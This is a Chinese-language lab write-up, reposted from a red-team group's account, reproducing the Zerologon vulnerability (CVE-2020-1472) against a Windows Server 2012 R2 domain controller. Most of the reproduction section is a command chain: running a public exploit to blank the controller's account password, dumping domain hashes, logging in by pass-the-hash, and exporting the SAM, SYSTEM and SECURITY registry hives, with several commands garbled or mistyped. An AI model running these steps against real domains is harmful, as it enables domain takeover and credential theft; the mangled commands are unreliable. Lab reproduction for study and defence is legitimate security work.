CVE-2020-1472漏洞复现

admin 2024年12月18日22:40:57评论8 views字数 1956阅读6分31秒阅读模式
CVE-2020-1472漏洞复现
01

 漏洞描述

攻击者使用Netlogon远程协议建立与域控制器连接的Netlogon安全通道时,存在特权提升漏洞,当成功利用时,攻击者可以无需通过身份验证,在网络中的设备上运行经过特殊设计的应用程序,获取域控制器的管理员权限。
原理:Netlogon使用的AES认证算法中vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理理员密码置空。
CVE-2020-1472漏洞复现
02

 影响范围

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2012

Windows Server 2012 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 R2 (Server Core installation)

Windows Server 2016

Windows Server 2016 (Server Core installation)

Windows Server 2019

Windows Server 2019 (Server Core installation)

Windows Server, version 1903 (Server Core installation)

Windows Server, version 1909 (Server Core installation)

Windows Server, version 2004 (Server Core installation)

CVE-2020-1472漏洞复现
03

 复现环境

DC:

版本:windows server 2012R2

IP:192.168.111.133/24

Kali:

IP:192.168.111.128/24

Python:3.8.6

CVE-2020-1472漏洞复现
04

 复现过程

下载检测工具检测是否存在漏洞:
git clone https://github.com/SecuraBV/CVE-2020-1472cd CVE-2020-1472
python3 zerologon tester.py 域控的计算机名 域控IP
如图:显示susccess! 证明可能存在此漏洞
CVE-2020-1472漏洞复现
安装impacke:
git clone https://github.co/SecureAuthCorp/impacket
CVE-2020-1472漏洞复现
cd impacket pip install
CVE-2020-1472漏洞复现
下载CVE-2020-142 exp:
cd examplesgit clone https://github.com/dirkjanm/CVE-2020-1472
CVE-2020-1472漏洞复现
置空域控保存在AD中的密码:
python cve-2020-1472-explit.py 域控计算机名 域控IP
CVE-2020-1472漏洞复现
抓取域控用户的Hash:
通过secresdump.py来获取域控相关hash
Python secretsdump.py 域/域控计算机名$@域控ip -jus-dc -no-pass
CVE-2020-1472漏洞复现
利用获取的hash 去做登陆:
Python wmiexec.py -hashes 账户哈希 域/账户名@域控IP
CVE-2020-1472漏洞复现
可以看到成功登陆域控机
CVE-2020-1472漏洞复现
抓取SAM文件中原来的HASH到本地:
reg save HKLMSYSTEM system.savereg save HKLMSAM sam.exereg save HKLMSECURITY security.savelget system.savelget sam.savelget security.save
CVE-2020-1472漏洞复现
退出shell破解提取到的hash,记住password_hex后的那一串
python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
CVE-2020-1472漏洞复现
下载hash恢复工具:
git clone https://github.com/risksense/zerologon
CVE-2020-1472漏洞复现
用命令恢复原来的密码:
python reinstall_original_pw.py 域控计算机名 域控IP 保存的那串hash值
CVE-2020-1472漏洞复现
再次用nopass尝试抓取域控的用户hash,验证是否成功恢复
CVE-2020-1472漏洞复现

注:文章仅参考学习,若有侵权联系删除

往期精彩推荐
CVE-2020-1472漏洞复现

记一次搭建靶场渗透过程(1)

记一次搭建靶场渗透过程(2)

记一次搭建靶场渗透过程(3)

CVE-2020-1472漏洞复现

CVE-2020-1472漏洞复现

           团队介绍

银河护卫队super,是一个致力于红队攻防实战、内网渗透、代码审计、安卓逆向、安全运维等技术干货分享的队伍,定期分享常用渗透工具、复现教程等资源。欢迎有想法、乐于分享的具备互联网分享精神的安全人士进行交流学习。
CVE-2020-1472漏洞复现

点击关注银河护卫队super

原文始发于微信公众号(银河护卫队super):CVE-2020-1472漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月18日22:40:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-1472漏洞复现https://cn-sec.com/archives/763341.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息